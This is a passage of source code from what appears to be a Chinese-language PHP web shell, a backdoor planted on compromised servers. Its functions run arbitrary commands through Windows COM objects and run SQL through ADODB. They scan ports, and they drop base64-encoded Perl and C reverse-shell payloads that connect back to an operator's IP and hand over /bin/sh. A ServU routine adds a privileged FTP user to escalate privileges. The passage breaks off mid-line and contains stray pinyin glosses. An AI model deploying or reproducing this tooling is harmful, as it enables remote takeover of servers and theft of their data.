$out = $exe->StdOut();
$output = $out->ReadAll();
echo '
'.$output.'
';
@$shell->Release();
$shell = NULL;
echo '
';
}
}
elseif($object == 'application')
{
$run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe';
$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\boot.ini d:\a.txt';
print<<
程序路徑
命令參數
END;
if(!empty($_POST['run']))
{
echo '
';
$shell = new COM('application');
echo (@$shell->ShellExecute($run,'/c '.$cmd) == '0') ? '執行成功' : '執行失敗';
@$shell->Release();
$shell = NULL;
echo '
';
}
}
elseif($object == 'adodb')
{
$string = isset($_POST['string']) ? $_POST['string'] : '';
$sql = isset($_POST['sql']) ? $_POST['sql'] : '';
print<<
連接字符串--連接示例--Access連接MsSql連接MySql連接Oracle連接--SQL語法--顯示數據添加數據删除數據修改數據建數據表删數據表添加字段删除字段
SQL命令
END;
if(!empty($string))
{
echo '
';
$shell = new COM('adodb');
@$shell->Open($string);
$result = @$shell->Execute($sql);
$count = $result->Fields->Count();
for($i = 0;$i < $count;$i++){$Field[$i] = $result->Fields($i);}
echo $result ? $sql.' 執行成功
' : $sql.' 執行失敗
';
if(!empty($count)){while(!$result->EOF){for($i = 0;$i < $count;$i++){echo htmlspecialchars($Field[$i]->value).'
';}@$result->MoveNext();}}
$shell->Close();
@$shell->Release();
$shell = NULL;
echo '
';
}
}
return true;
}
//掃描端口
function Port_i()
{
$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|22|23|25|80|110|135|139|445|1433|3306|3389|8000|43958';
print<<
掃描IP
端口号
END;
if((!empty($_POST['ip'])) && (!empty($_POST['port'])))
{
echo '
';
$ports = explode('|', $_POST['port']);
for($i = 0;$i < count($ports);$i++) { $fp = @fsockopen($_POST['ip'],$ports[$i],&$errno,&$errstr,2); echo $fp ? '開(kāi)放(fàng)端口 ---> '.$ports[$i].'
' : '關閉端口 ---> '.$ports[$i].'
';
ob_flush();
flush();
}
echo '
';
}
return true;
}
//Linux提權
function Linux_k()
{
$yourip = isset($_POST['yourip']) ? $_POST['yourip'] : getenv('REMOTE_ADDR');
$yourport = isset($_POST['yourport']) ? $_POST['yourport'] : '12666';
print<<
你(nǐ)的地址
連接端口
執行方式perlc
END;
if((!empty($_POST['yourip'])) && (!empty($_POST['yourport'])))
{
echo '
';
if($_POST['use'] == 'perl')
{
$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
echo File_Write('/tmp/yoco_bc',base64_decode($back_connect_pl),'wb') ? '創建/tmp/yoco_bc成功
' : '創建/tmp/yoco_bc失敗
';
$perlpath = Exec_Run('which perl');
$perlpath = $perlpath ? chop($perlpath) : 'perl';
echo Exec_Run($perlpath.' /tmp/yoco_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗';
}
if($_POST['use'] == 'c')
{
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
echo File_Write('/tmp/yoco_bc.c',base64_decode($back_connect_c),'wb') ? '創建/tmp/yoco_bc.c成功
' : '創建/tmp/yoco_bc.c失敗
';
$res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
@unlink('/tmp/yoco.c');
echo Exec_Run('/tmp/yoco_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗';
}
echo '
你(nǐ)可以嘗試連接端口 (nc -l -n -v -p '.$_POST['yourport'].')
';
}
return true;
}
//ServU
function Servu_l()
{
$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
print<<
[執行命令] [添加用(yòng)戶]
ServU端口
ServU用(yòng)戶
ServU密碼
END;
if($_GET['o'] == 'adduser')
{
print<<
帳号密碼目錄END;
}
else
{
print<<
提權命令
END;
}
echo '
';
if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))
{
echo '
';
$sendbuf = "";
$recvbuf = "";
$domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";
$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".
"-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".
"-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";
$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";
$sock = @fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10);
$recvbuf = @fgets($sock, 1024);
echo "返回數據包: $recvbuf
";
$sendbuf = "USER ".$_POST["SUUser"]."\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "發送數據包: $sendbuf
";
$recvbuf = @fgets($sock, 1024);
echo "返回數據包: $recvbuf
";
$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "發送數據包: $sendbuf
";
$recvbuf = @fgets($sock, 1024);
echo "返
